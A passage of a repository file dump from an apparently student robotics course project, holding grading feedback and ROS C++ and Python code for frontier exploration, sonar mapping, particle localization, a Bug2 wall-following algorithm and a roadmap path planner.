}\n}\n"
},
{
"alpha_fraction": 0.7490118741989136,
"alphanum_fraction": 0.7602108120918274,
"avg_line_length": 36.974998474121094,
"blob_id": "aba6b0dc37601fc969d258972c6786438e8ba691",
"content_id": "823aa060ffb0b3d58c3159e1e2161d5537b9fa5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1518,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 40,
"path": "/grades/20140503.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Definition of test cases\n - Good coverage over intended functionality: 1.5/2\n* Testing\n - Running and documentation of tests: 0.5/1\n - Justification of implementation choices: 0.5/1\n* Repository state\n - Structure (team workflow, commit messages): 1/1\n - Code quality, API documentation and coherency: 1/1\n\n_Total:_ 4.5 points\n\nFeedback\n========\n\nPlease use the correct team member names.\n\n# Definition of test cases\n\nYour \"approach\" test is not a test, much rather it is inferred from the \"completeness\" test. In the last test (bug2) you seem to mix behaviour in test scenarios and \"implementation\". \n\nAs was described in the assignment, \"make absolutely sure that you\ntest the various solutions using the same preconditions (e.g. use the same start and goal positions,\nclearance levels, speeds, etc.). All parameters and preconditions for each test must be documented\". \n\n# Testing\n\nWe would have liked to see some data, maybe some screenshots, comparative tables, etc. Right now we have to take your word for the results to actually represent the current software status.\n\nFor omni velocity controller the results seem to point to the first solution to be better than the second one. Although e.g. the first test fails you seem to conclude that the implementation achieves all tasks. \n\n# Repository state\n\nWorkflow and commit messages are good. \n\nCode quality and documentation are excellent.\n\nThe code is compiling and successfully went through a test on the bug2 algorithm."
},
{
"alpha_fraction": 0.6552528142929077,
"alphanum_fraction": 0.6599165201187134,
"avg_line_length": 34.89427185058594,
"blob_id": "4ca29b6f0c6b67bde53a57cb2d2c627bfe1004f5",
"content_id": "800613fdc077d05f76ac69a42083b1327b4f0256",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8148,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 227,
"path": "/amr_exploration/nodes/explorer.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n\n#include <amr_msgs/ExecutePathGoal.h>\n#include <amr_msgs/ExecutePathAction.h>\n#include <amr_msgs/ExecutePathActionResult.h>\n#include <amr_srvs/PlanPath.h>\n\n#include <amr_msgs/PathExecutionFailure.h>\n#include <amr_msgs/ExecutePathGoal.h>\n#include <amr_msgs/ExecutePathAction.h>\n\n#include <nav_msgs/Odometry.h>\n#include <geometry_msgs/Pose.h>\n#include <amr_srvs/GetNearestOccupiedPointOnBeam.h>\n#include <actionlib/client/simple_action_client.h>\n#include <actionlib/client/terminal_state.h>\n\n#include <pcl/point_types.h>\n#include <pcl_ros/point_cloud.h>\n#include <math.h>\n#include <tf/tf.h>\n#include <ros/duration.h>\n\n#include \"clustered_point_cloud_visualizer.h\"\n#include \"frontier.h\"\n\n#define mapCallback_debug false\n#define explore_debug true\n#define robot_position_debug false\n#define move_point_near_debug false\n\n#define reduction 0.1\n\nclass ExplorerNode\n{\n\npublic:\n\n ExplorerNode()\n : frontier_clusters_publisher_(\"frontier_clusters\", \"odom\")\n , world_is_explored_(false)\n , position_reported(false)\n , path_exec_(\"/path_executor/execute_path\",true)\n // , plan_nh_(\"~\")\n {\n frontier_publisher_ = nh_.advertise<Frontier::PointCloud>(\"frontier_points\", 1);\n map_subscriber_ = nh_.subscribe(\"sonar_mapper/map\", 1, &ExplorerNode::mapCallback, this);\n position_subscriber_ = nh_.subscribe(\"/odom\", 1, &ExplorerNode::robot_position_cb, this);\n\n robot_position_.position.x = 0;\n robot_position_.position.y = 0;\n path_planer_ = nh_.serviceClient<amr_srvs::PlanPath>(\"path_planner/plan_path\");\n occupancy_query_ = occupancy_nh_.serviceClient<amr_srvs::GetNearestOccupiedPointOnBeam>(\"/occupancy_query_server/get_nearest_occupied_point_on_beam\");\n\n ROS_INFO_STREAM(\"Wating for path executor...\");\n path_exec_.waitForServer();\n }\n\n void mapCallback(const nav_msgs::OccupancyGridConstPtr& msg)\n {\n Frontier frontier(msg);\n frontier_publisher_.publish(frontier.getPointCloud());\n frontier_clusters_publisher_.publish<Frontier::Point>(frontier.getClusterPointClouds());\n\n std::vector<Frontier::PointCloud::Ptr> frontier_clusters = frontier.getClusterPointClouds();\n \n Frontier::PointCloud::VectorType frontiers_center = frontier.getClusterCentroids();\n frontier_clusters_centroids_.resize(frontiers_center.size());\n\n ROS_WARN_STREAM_COND(mapCallback_debug,\"Frointer Count :\"<<frontier_clusters.size());\n int j =0;\n for(int i = 0;i < frontier_clusters.size(); i++){\n Frontier::PointCloud::Ptr cluster = frontier_clusters[i];\n if(cluster->size() > 10){\n frontier_clusters_centroids_[j] = frontiers_center[i];\n j = j +1;\n }\n }\n frontier_clusters_centroids_.resize(j);\n if(frontier_clusters_centroids_.size() > 0){\n world_is_explored_ = false;\n }else{\n world_is_explored_ = true;\n }\n ROS_INFO_STREAM_COND(mapCallback_debug,\"Eligible Frontier Count: \"<<frontier_clusters_centroids_.size());\n }\n\n void explore()\n {\n while (ros::ok() && !world_is_explored_)\n {\n bool path_planed = false;\n // do not start till you have a frontier\n if(frontier_clusters_centroids_.size() <= 0 || !position_reported){\n }else{\n // Choosing a target\n // the frontier with least distance form robot.\n int ind = 0;\n int plan_ind = 0;\n amr_srvs::PlanPath srv;\n for(int i=0; i < frontier_clusters_centroids_.size(); i++){\n Frontier::Point point = frontier_clusters_centroids_[i];\n if(!path_planed && plan_path_to(point,srv)){\n path_planed = true;\n plan_ind = i;\n }\n if(i != 0 && distance_from_robot(point) 
< distance_from_robot(frontier_clusters_centroids_[ind])){\n ind = i;\n }\n }\n Frontier::Point new_point;\n if(!path_planed){\n ROS_INFO_STREAM_COND(explore_debug,\"Found Nearest Frontier at index:\"<<ind<<\" at distance\"<<distance_from_robot(frontier_clusters_centroids_[ind]));\n new_point = move_point_near_robot(frontier_clusters_centroids_[ind]);\n // Planing a path to current target\n path_planed = plan_path_to(new_point,srv);\n }\n \n // Executeing the path\n amr_msgs::ExecutePathGoal goal;\n goal.skip_unreachable = true;\n ros::Duration wait_duration;\n if(path_planed){\n goal.path.poses.resize(srv.response.path.poses.size());\n goal.path.poses = srv.response.path.poses;\n wait_duration = ros::Duration(0,0);\n }else{\n goal.path.poses.resize(1);\n geometry_msgs::PoseStamped pose_s;\n pose_s.pose.position.x = new_point.x;\n pose_s.pose.position.y = new_point.y;\n pose_s.pose.orientation = robot_position_.orientation;\n goal.path.poses[0] = pose_s;\n wait_duration= ros::Duration(0,0);\n }\n path_exec_.sendGoal(goal);\n if(!path_exec_.waitForResult(wait_duration)){\n ROS_ERROR(\"Path Not Completed\");\n }\n \n // ...\n }\n ros::spinOnce();\n }\n ROS_INFO_COND(world_is_explored_, \"World is completely explored, exiting...\");\n }\n\n void robot_position_cb(const nav_msgs::Odometry& msg){\n\n robot_position_.position.x = msg.pose.pose.position.x;\n robot_position_.position.y = msg.pose.pose.position.y;\n robot_position_.orientation = msg.pose.pose.orientation;\n position_reported = true;\n ROS_INFO_STREAM_COND(robot_position_debug,\"Robot is at: (\"<<robot_position_.position.x<<\",\"<<robot_position_.position.y<<\")\");\n }\n\n Frontier::Point move_point_near_robot(Frontier::Point point){\n ROS_INFO_COND(move_point_near_debug,\"Moving Point(%2f,%2f)\",point.x,point.y);\n amr_srvs::GetNearestOccupiedPointOnBeam service;\n service.request.beams.resize(1);\n service.request.beams[0].x = point.x;\n service.request.beams[0].y = point.y;\n service.request.beams[0].theta = atan2(point.y- robot_position_.position.y,point.x- robot_position_.position.x);\n if (occupancy_query_.call(service)){\n ROS_INFO_STREAM_COND(explore_debug,\"nerest points count \"<<service.response.points.size());\n\n }else{\n ROS_ERROR(\"Failed to call service occupancy_query_server\");\n }\n Frontier::Point new_point;\n new_point.x= service.response.points[0].x;\n new_point.y= service.response.points[0].y;\n ROS_INFO_COND(move_point_near_debug,\"New Point(%2f,%2f)\",new_point.x,new_point.y);\n return new_point;\n }\n\n float distance_from_robot(Frontier::Point point){\n //Getting Robot position\n \n return sqrt(pow(robot_position_.position.x - point.x,2)+pow(robot_position_.position.y - point.y,2));\n }\n\n bool plan_path_to(Frontier::Point end_point,amr_srvs::PlanPath& srv){\n // Planing a path to current target\n srv.request.start.x = robot_position_.position.x;\n srv.request.start.y = robot_position_.position.y;\n srv.request.end.x = end_point.x;\n srv.request.end.y = end_point.y;\n ROS_INFO_STREAM_COND(explore_debug,\"Planing Path to Nearest Frontier...\");\n ROS_INFO_STREAM_COND(explore_debug,\"From: (\"<<srv.request.start.x<<\",\"<<srv.request.start.y<<\") To: (\"<<srv.request.end.x<<\",\"<<srv.request.end.y<<\")\");\n if (path_planer_.call(srv)){\n ROS_INFO_STREAM_COND(explore_debug,\"Path Planed with \"<<srv.response.path.poses.size()<<\" poses\");\n return true;\n }else{\n ROS_ERROR(\"Failed to call service plan_path\");\n return false;\n }\n }\n\nprivate:\n\n ros::NodeHandle nh_;\n ros::NodeHandle 
occupancy_nh_;\n\n ros::Subscriber map_subscriber_;\n ros::Publisher frontier_publisher_;\n ClusteredPointCloudVisualizer frontier_clusters_publisher_;\n\n ros::Subscriber position_subscriber_;\n ros::ServiceClient path_planer_;\n ros::ServiceClient occupancy_query_;\n actionlib::SimpleActionClient<amr_msgs::ExecutePathAction> path_exec_;\n Frontier::PointCloud::VectorType frontier_clusters_centroids_;\n bool world_is_explored_;\n bool position_reported;\n geometry_msgs::Pose robot_position_;\n\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"explorer\");\n ExplorerNode en;\n en.explore();\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5471406579017639,
"alphanum_fraction": 0.5533230304718018,
"avg_line_length": 17.457143783569336,
"blob_id": "faf5fe3fce1cf6b9764474a1616e7865bfde1ceb",
"content_id": "7e70b966e6943ebb1adb1152a38ed89cdd8a2ec1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 647,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 35,
"path": "/amr_localization/include/pose.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef POSE_H\n#define POSE_H\n\n#include <iostream>\n\n/** This structure represents pose in 2d space. */\nstruct Pose\n{\n\n double x;\n double y;\n double theta;\n\n Pose() : x(0), y(0), theta(0) { }\n\n Pose(double x, double y, double theta) : x(x), y(y), theta(theta) { }\n\n Pose(const Pose& other) : x(other.x), y(other.y), theta(other.theta) { }\n\n const Pose& operator=(const Pose& other)\n {\n x = other.x;\n y = other.y;\n theta = other.theta;\n return *this;\n }\n\n friend std::ostream& operator<<(std::ostream& out, const Pose& p)\n {\n return out << \"[\" << p.x << \", \" << p.y << \", \" << p.theta << \"]\";\n }\n\n};\n\n#endif /* POSE_H */\n\n"
},
{
"alpha_fraction": 0.6146131753921509,
"alphanum_fraction": 0.6185018420219421,
"avg_line_length": 34.92647171020508,
"blob_id": "52873e9e962cb4a084791ad4b305daf67937a667",
"content_id": "8f88f3aa4c151dc71d89968b1dc6e9312f212538",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4886,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 136,
"path": "/amr_bugs/src/amr_bugs/bug_brain.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nPACKAGE = 'amr_bugs'\n\nimport rospy\nimport math\nimport planar\nfrom planar import Point, Vec2, EPSILON\nfrom planar.c import Line\nfrom math import degrees\n\n\nclass BugBrain:\n\n # declearing constants\n LEFT_WALLFOLLOWING = 0\n RIGHT_WALLFOLLOWING = 1\n LEFT_SIDE = -1\n RIGHT_SIDE = 1\n\n def __init__(self, goal_x, goal_y, side):\n # saving which wall following is being used.\n self.wall_side = side\n # saving goal point\n self.wp_destination = Point(goal_x, goal_y)\n # flag to check that robot has started wall following.\n self.path_started = False\n #the tolerence == planar.EPSILON at default value does not work good\n planar.set_epsilon(0.2)\n # storing distance to the destination when leaving the wall \n self.distance_when_left = 9999 # huge initial value\n pass\n \n # method to determin if the destenation is on opposit side of wall being followed.\n # @param: distance\n # signed distance from the robot to goal.\n # can be obtained by path_line.distance_to(ROBOT CURRENT POSITION).\n def is_destination_opposite_to_wall(self,distance):\n direction = math.copysign(1,distance)\n\n if(self.wall_side == self.LEFT_WALLFOLLOWING):\n if(direction == self.RIGHT_SIDE):\n return True\n else:\n return False\n else:\n if(direction == self.LEFT_SIDE):\n return True\n else:\n return False\n pass\n \n def follow_wall(self, x, y, theta):\n \"\"\"\n This function is called when the state machine enters the wallfollower\n state.\n \"\"\"\n # compute and store necessary variables\n theta = degrees(theta)\n position = Point(x,y)\n # storing distance to goal, later using it to decide when to leave the wall\n self.distance_when_left = self.wp_destination.distance_to(Point(x,y))\n\n self.ln_path = Line.from_points([position,self.wp_destination])\n # saving where it started wall following\n self.wp_wf_start = position\n pass\n \n\n def leave_wall(self, x, y, theta):\n \"\"\"\n This function is called when the state machine leaves the wallfollower\n state.\n \"\"\"\n # compute and store necessary variables\n self.path_started = False\n self.distance_when_left = self.wp_destination.distance_to(Point(x,y))\n self.wp_left_wall_at = Point(x,y)\n pass\n\n def is_goal_unreachable(self, x, y, theta):\n \"\"\"\n This function is regularly called from the wallfollower state to check\n the brain's belief about whether the goal is unreachable.\n \"\"\"\n # if the robot goes around an obstacle and\n # reaches the starting point and the destenation is still not reached then\n # the goal is unreachable.\n distance_to_path= self.ln_path.distance_to(Point(x,y))\n\n if(abs(distance_to_path) < planar.EPSILON and\n Vec2(x,y).almost_equals(self.wp_wf_start) and \n self.path_started):\n rospy.logwarn(\"UNREACHABLE POINT!\")\n return True\n\n return False\n\n def is_time_to_leave_wall(self, x, y, theta):\n \"\"\"\n This function is regularly called from the wallfollower state to check\n the brain's belief about whether it is the right time (or place) to\n leave the wall and move straight to the goal.\n \"\"\"\n\n self.current_theta = degrees(theta)\n\n self.wp_current_position = Point(x,y)\n self.current_direction = Vec2.polar(angle = self.current_theta,length = 1)\n #Robot Orientation Line.\n self.ln_current_orentation = Line(Vec2(x,y),self.current_direction)\n\n # the prependicular line to the path\n self.ln_distance = self.ln_path.perpendicular(self.wp_current_position)\n \n \n distance_to_path= self.ln_path.distance_to(Point(x,y))\n self.distance_to_path = distance_to_path\n 
distance_to_destination = self.ln_current_orentation.distance_to(self.wp_destination)\n if(abs(distance_to_path) > 0.5):\n self.path_started =True\n\n self.distance_to_goal = self.wp_destination.distance_to(Point(x,y))\n \"\"\"\n checking if distance to the straight path is approx. 0 and\n if destenation on the opposit side of wall then leave the path\n NOTE and TODO: works only for the circles not for complex path.\n \"\"\"\n if(abs(distance_to_path) < planar.EPSILON and \n self.distance_to_goal < self.distance_when_left and\n self.is_destination_opposite_to_wall(distance_to_destination) and \n self.path_started): # is robot started following wall!\n self.wp_wf_stop = Point(x,y)\n return True\n\n return False\n"
},
{
"alpha_fraction": 0.68217933177948,
"alphanum_fraction": 0.6836927533149719,
"avg_line_length": 29.720930099487305,
"blob_id": "13a5837bb044a6797f6542f701f959dc2e052de2",
"content_id": "457d4ba1183ffa8779fc485221b74348d154d235",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2643,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 86,
"path": "/amr_localization/include/random_particle_generator.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef RANDOM_PARTICLE_GENERATOR_H\n#define RANDOM_PARTICLE_GENERATOR_H\n\n#include <random>\n\n#include \"particle.h\"\n\n/** This class generates particles with random poses.\n *\n * By default the poses are drawn from a uniform distribution across the\n * rectangle given in the constructor. Optinally a bias towards a particular\n * pose may be introduced for a limited time (see @ref setBias()). */\nclass RandomParticleGenerator\n{\n\npublic:\n\n RandomParticleGenerator(double min_x, double max_x, double min_y, double max_y)\n : uniform_x_(min_x, max_x)\n , uniform_y_(min_y, max_y)\n , uniform_theta_(-M_PI, M_PI)\n , biased_particles_(0)\n { }\n\n /** Generate a random particle. */\n Particle generateParticle()\n {\n Particle p;\n if (biased_particles_-- > 0)\n {\n p.pose.x = normal_x_(random_generator_);\n p.pose.y = normal_y_(random_generator_);\n p.pose.theta = normal_theta_(random_generator_);\n }\n else\n {\n p.pose.x = uniform_x_(random_generator_);\n p.pose.y = uniform_y_(random_generator_);\n p.pose.theta = uniform_theta_(random_generator_);\n }\n p.weight = 0.0;\n return p;\n }\n\n /** Introduce a bias towards a certain point.\n *\n * Here by bias we mean that the poses will be drawn from a normal\n * distribution around the bias pose.\n *\n * @param pose : a pose around which random samples will be drawn.\n *\n * @param std : standard deviation (same for x, y, and theta).\n *\n * @param particle_count : number of particles for which the bias will have\n * effect. After this many particles have been produced, the generator\n * switches to the \"uniform\" mode. */\n void setBias(Pose pose, double std, int particle_count)\n {\n normal_x_ = std::normal_distribution<double>(pose.x, std);\n normal_y_ = std::normal_distribution<double>(pose.y, std);\n normal_theta_ = std::normal_distribution<double>(pose.theta, std);\n biased_particles_ = particle_count;\n }\n\nprivate:\n\n // Required for random number generation\n std::default_random_engine random_generator_;\n\n // Uniform distributions from which poses for non-biased random particles are sampled\n std::uniform_real_distribution<double> uniform_x_;\n std::uniform_real_distribution<double> uniform_y_;\n std::uniform_real_distribution<double> uniform_theta_;\n\n // Normal distributions from which poses for biased random particles are sampled\n std::normal_distribution<double> normal_x_;\n std::normal_distribution<double> normal_y_;\n std::normal_distribution<double> normal_theta_;\n\n Pose bias_pose_;\n double bias_std_;\n int biased_particles_;\n\n};\n\n#endif /* RANDOM_PARTICLE_GENERATOR_H */\n\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.737500011920929,
"avg_line_length": 24.236841201782227,
"blob_id": "67c61811b4eb13c1ebdd3a92caa16e78148d364a",
"content_id": "0e07f93dc9a42de3ada5c9851a4d5058b38eca13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 38,
"path": "/amr_localization/include/particle_visualizer.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef PARTICLE_VISUALIZER_H\n#define PARTICLE_VISUALIZER_H\n\n#include <memory>\n#include <string>\n\n#include <ros/ros.h>\n\n#include \"particle.h\"\n\n/** A helper class that visualizes sets of partiles.\n *\n * Given a vector of particles it constructs and publishes ROS marker array,\n * that could be viewed with RViz. Each particle is represented by an arrow\n * having the pose proposed by the particle and the alpha corresponding to its\n * weight. The particle with the largest weight has alpha 1.0 (i.e. completely\n * opaque), and the particle with the smallest weight has alpha 0.1 (i.e.\n * almost transparent). */\nclass ParticleVisualizer\n{\n\npublic:\n\n typedef std::unique_ptr<ParticleVisualizer> UPtr;\n\n ParticleVisualizer(const std::string& topic_name, const std::string& frame_id);\n\n void publish(const ParticleVector& particles);\n\nprivate:\n\n ros::Publisher marker_publisher_;\n\n const std::string frame_id_;\n\n};\n\n#endif /* PARTICLE_VISUALIZER_H */\n\n"
},
{
"alpha_fraction": 0.6304348111152649,
"alphanum_fraction": 0.6396781802177429,
"avg_line_length": 33.562129974365234,
"blob_id": "512901c46f819247093bf6a9ff6f00eeaeebefb7",
"content_id": "aaf84758468dfe45a985c80ef188004daa0eaf0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5842,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 169,
"path": "/amr_mapping/nodes/sonar_mapper.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n#include <nav_msgs/MapMetaData.h>\n#include <nav_msgs/OccupancyGrid.h>\n#include <amr_msgs/Ranges.h>\n#include <amr_srvs/SwitchRanger.h>\n#include <tf/transform_listener.h>\n\n#include \"sonar_map.h\"\n\nclass SonarMapperNode\n{\n\npublic:\n\n SonarMapperNode()\n : transform_listener_(ros::Duration(10))\n {\n // Read settings from the parameter server\n ros::NodeHandle pn(\"~\");\n double resolution;\n double size_x;\n double size_y;\n pn.param<std::string>(\"frame_id\", frame_id_, \"odom\");\n pn.param<double>(\"resolution\", resolution, 0.06);\n pn.param<double>(\"size_x\", size_x, 16);\n pn.param<double>(\"size_y\", size_y, 16);\n pn.param<double>(\"map_publication_period\", map_publication_period_, 3);\n // Create empty map\n map_ = SonarMap::UPtr(new SonarMap(resolution, size_x, size_y));\n // Publishers and subscribers\n map_publisher_ = pn.advertise<nav_msgs::OccupancyGrid>(\"map\", 1, true);\n map_free_publisher_ = pn.advertise<nav_msgs::OccupancyGrid>(\"map_free\", 1, true);\n map_occupied_publisher_ = pn.advertise<nav_msgs::OccupancyGrid>(\"map_occupied\", 1, true);\n sonar_subscriber_ = nh_.subscribe<amr_msgs::Ranges>(\"/sonar_pioneer\", 10, boost::bind(&SonarMapperNode::sonarCallback, this, _1));\n // Force publish (initially empty) maps\n publishMaps(true);\n }\n\n void sonarCallback(const amr_msgs::Ranges::ConstPtr& msg)\n {\n for (const auto& range : msg->ranges)\n {\n // Get sonar position in the map frame\n tf::StampedTransform transform;\n try\n {\n ros::Time time;\n std::string str;\n transform_listener_.getLatestCommonTime(frame_id_, range.header.frame_id, time, &str);\n transform_listener_.lookupTransform(frame_id_, range.header.frame_id, time, transform);\n }\n catch (tf::TransformException& ex)\n {\n ROS_WARN(\"Unable to incorporate sonar reading in the map because of unavailable transform. 
Reason: %s.\", ex.what());\n continue;\n }\n\n // Incorporate range reading in the map\n map_->addScan(transform.getOrigin().getX(),\n transform.getOrigin().getY(),\n tf::getYaw(transform.getRotation()),\n range.field_of_view,\n range.max_range,\n range.range,\n calculateRangeUncertainty(range.range, range.max_range));\n }\n publishMaps();\n }\n\nprivate:\n\n void publishMaps(bool force = false)\n {\n if (force || last_map_publication_ + ros::Duration(map_publication_period_) <= ros::Time::now())\n {\n // Query map properties\n int width = map_->getGridSizeX();\n int height = map_->getGridSizeY();\n double min_x = map_->getMinX();\n double min_y = map_->getMinY();\n double resolution = map_->getResolution();\n // Publish maps\n map_publisher_.publish(createOccupancyGridMessage(width, height, min_x, min_y, resolution, -1.0, 1.0, map_->getMapData()));\n map_free_publisher_.publish(createOccupancyGridMessage(width, height, min_x, min_y, resolution, 0.0, 1.0, map_->getMapFreeData()));\n map_occupied_publisher_.publish(createOccupancyGridMessage(width, height, min_x, min_y, resolution, 0.0, 1.0, map_->getMapOccupiedData()));\n last_map_publication_ = ros::Time::now();\n }\n }\n\n double calculateRangeUncertainty(double range, double max_range) const\n {\n if (range < 0.1 * max_range)\n return 0.01 * max_range;\n else if (range < 0.5 * max_range)\n return 0.1 * range;\n else\n return 0.05 * max_range;\n }\n\n nav_msgs::OccupancyGridPtr createOccupancyGridMessage(int width, int height, double origin_x, double origin_y, double resolution, double min, double max, const double* data) const\n {\n const double EPSILON = 1e-5;\n const double range = max - min;\n nav_msgs::OccupancyGridPtr grid_msg(new nav_msgs::OccupancyGrid);\n grid_msg->info.width = width;\n grid_msg->info.height = height;\n grid_msg->info.resolution = resolution;\n grid_msg->info.map_load_time = ros::Time::now();\n grid_msg->header.stamp = ros::Time::now();\n grid_msg->header.frame_id = frame_id_;\n grid_msg->info.origin.position.x = origin_x;\n grid_msg->info.origin.position.y = origin_y;\n grid_msg->data.resize(width * height);\n int i = 0;\n for (int x = 0; x < width; x++)\n for (int y = 0; y < height; y++, i++)\n {\n double d = data[x * height + y];\n if (d > max - EPSILON)\n grid_msg->data[i] = 100;\n else if (d < min + EPSILON)\n grid_msg->data[i] = 0;\n else\n grid_msg->data[i] = (d - min) / range * 100;\n }\n return grid_msg;\n }\n\n SonarMap::UPtr map_;\n std::string frame_id_;\n tf::TransformListener transform_listener_;\n double sonar_uncertainty_;\n double map_publication_period_;\n ros::Time last_map_publication_;\n\n ros::NodeHandle nh_;\n ros::Publisher map_publisher_;\n ros::Publisher map_free_publisher_;\n ros::Publisher map_occupied_publisher_;\n ros::Subscriber sonar_subscriber_;\n\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"sonar_mapper\");\n ros::NodeHandle nh;\n // Wait until SwitchRanger service (and hence stage node) becomes available.\n ROS_INFO(\"Waiting for the /switch_ranger service to be advertised...\");\n ros::ServiceClient switch_ranger_client = nh.serviceClient<amr_srvs::SwitchRanger>(\"/switch_ranger\");\n switch_ranger_client.waitForExistence();\n // Make sure that the pioneer sonars are available and enable them.\n amr_srvs::SwitchRanger srv;\n srv.request.name = \"sonar_pioneer\";\n srv.request.state = true;\n if (switch_ranger_client.call(srv))\n {\n ROS_INFO(\"Enabled pioneer sonars.\");\n }\n else\n {\n ROS_ERROR(\"Pioneer sonars are not available, shutting down.\");\n 
return 1;\n }\n SonarMapperNode smn;\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.5898815989494324,
"alphanum_fraction": 0.594187319278717,
"avg_line_length": 19.622222900390625,
"blob_id": "c786cddec35777cb7f8036ebf57cbb682b72de74",
"content_id": "4673429e24df9a9fc33173b813cd3145aca9af9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 929,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 45,
"path": "/amr_navigation/include/velocity.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef VELOCITY_H\n#define VELOCITY_H\n\n#include <geometry_msgs/Twist.h>\n\n/** This structure reprosents velocity in 2d space. */\nstruct Velocity\n{\n\n float x;\n float y;\n float theta;\n\n Velocity() : x(0), y(0), theta(0) { }\n\n Velocity(float x, float y, float theta) : x(x), y(y), theta(theta) { }\n\n Velocity(const Velocity& other) : x(other.x), y(other.y), theta(other.theta) { }\n\n const Velocity& operator=(const Velocity& other)\n {\n x = other.x;\n y = other.y;\n theta = other.theta;\n return *this;\n }\n\n /** Convenience cast operator to ROS Twist message. */\n operator geometry_msgs::Twist()\n {\n geometry_msgs::Twist twist;\n twist.linear.x = x;\n twist.linear.y = y;\n twist.angular.z = theta;\n return twist;\n }\n\n friend std::ostream& operator<<(std::ostream& out, const Velocity& p)\n {\n return out << \"[\" << p.x << \", \" << p.y << \", \" << p.theta << \"]\";\n }\n\n};\n\n#endif /* VELOCITY_H */\n\n"
},
{
"alpha_fraction": 0.5745699405670166,
"alphanum_fraction": 0.586088240146637,
"avg_line_length": 46.07746505737305,
"blob_id": "e40749d9a834c55ace6546459870954c17605d21",
"content_id": "c852ece4ecc406a57c137115ba470705789c0c17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6685,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 142,
"path": "/amr_navigation/src/amr_navigation/randomized_roadmap_planner.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport rospy\nfrom math import sqrt\nfrom random import uniform\nfrom pygraph.classes.graph import graph\nfrom pygraph.classes.exceptions import NodeUnreachable\nfrom pygraph.algorithms.heuristics.euclidean import euclidean\nfrom pygraph.algorithms.minmax import heuristic_search\n\nclass RandomizedRoadmapPlanner:\n\n def __init__(self, point_free_cb, line_free_cb, dimensions):\n \"\"\"\n Construct a randomized roadmap planner.\n\n 'point_free_cb' is a function that accepts a point (two-tuple) and\n outputs a boolean value indicating whether the point is in free space.\n\n 'line_free_cb' is a function that accepts two points (the start and the\n end of a line segment) and outputs a boolen value indicating whether\n the line segment is free from obstacles.\n\n 'dimensions' is a tuple of tuples that define the x and y dimensions of\n the world, e.g. ((-8, 8), (-8, 8)). It should be used when generating\n random points.\n \"\"\"\n self.point_free_cb = point_free_cb\n self.line_free_cb = line_free_cb\n self.dimensions = dimensions\n \n # Instantiate graph, heuristic and maximum number of tries\n self.graph = graph()\n self.heuristic = euclidean()\n self.max_tries = 50\n pass\n \n def plan(self, point1, point2):\n \"\"\"\n Plan a path which connects the two given 2D points.\n\n The points are represented by tuples of two numbers (x, y).\n\n Return a list of tuples where each tuple represents a point in the\n planned path, the first point is the start point, and the last point is\n the end point. If the planning algorithm failed the returned list\n should be empty.\n \"\"\"\n path_to_target = list()\n found_path_to_target = False\n \n # Saves start and end identifiers\n start_identifier = len(self.graph.nodes())\n end_identifier = start_identifier + 1\n \n #Check if points are free\n if self.point_free_cb(point1) and self.point_free_cb(point2):\n self.graph.add_node(start_identifier, attrs=[('position', point1)])\n self.graph.add_node(end_identifier, attrs=[('position', point2)])\n # Checks if start and end point can be connected\n if self.line_free_cb(point1, point2):\n self.graph.add_edge((start_identifier, end_identifier), wt = self.distance(point1, point2))\n # Find edges to the rest of the graph\n for node_identifier, attr in self.graph.node_attr.iteritems():\n position = attr[0][1]\n if point1 != position and point2 != position: # if point and position is the same, line_free does not return and hangs\n if self.line_free_cb(point1, position):\n self.graph.add_edge((start_identifier, node_identifier), wt = self.distance(point1, position)) \n if self.line_free_cb(point2, position):\n self.graph.add_edge((end_identifier, node_identifier), wt = self.distance(point2, position))\n else:\n # Stops if start or end point are not free\n rospy.logwarn(\"Start or End Point are not free\")\n return path_to_target\n \n # Searches for a path and if there is none, a random point is created and added to the graph\n count_tries = 0\n while not found_path_to_target:\n try:\n # Check if there is a path\n self.heuristic.optimize(self.graph)\n identifier_path = heuristic_search(self.graph, start_identifier, end_identifier, self.heuristic)\n found_path_to_target = True\n rospy.logwarn(\"Found a Path\")\n # Resolve identfier and push them into 